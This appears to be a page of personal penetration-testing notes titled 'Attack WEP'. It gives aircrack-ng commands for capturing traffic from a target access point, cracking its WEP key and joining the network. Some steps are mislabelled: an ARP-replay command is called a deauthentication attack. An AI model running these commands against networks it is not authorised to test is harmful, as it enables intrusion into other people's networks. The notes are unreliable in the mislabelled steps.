🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  1. WiFi Pentesting

Attack WEP

PreviousWPA-E (hostapd)NextEvil Twin - Wi-Fi

Last updated 6 days ago

Ref:

  1. Start Monitor mode:

# start monitor mode
sudo airmon-ng start wlan0

# stop monitor mode / wanna connect the wifi
sudo airmon-ng stop wlan0


# filter wps encryption
sudo airodump-ng wlan0mon --wps

  1. Start capture hash of the handshake:

sudo airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w capture_WEP wlan0

In parallel run deauthentication attack:

sudo aireplay-ng -3 -b $NAME_OF_SSID -h $STATION_MAC wlan0

  1. crack the handshake

sudo aircrack-ng capture_WEP.cap

After cracking, you can directly connect the WiFi by the UI or terminal below:

Make sure stop the monitor mode before connecting

sudo iwconfig wlan0 essid <target SSID Name> key <hexKey>

# refresh the DHCP Configuration
sudo dhclient wlan0

Stuck?

--> https://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html

LogoGitHub - ricardojoserf/wifi-pentesting-guide: WiFi Penetration Testing GuideGitHub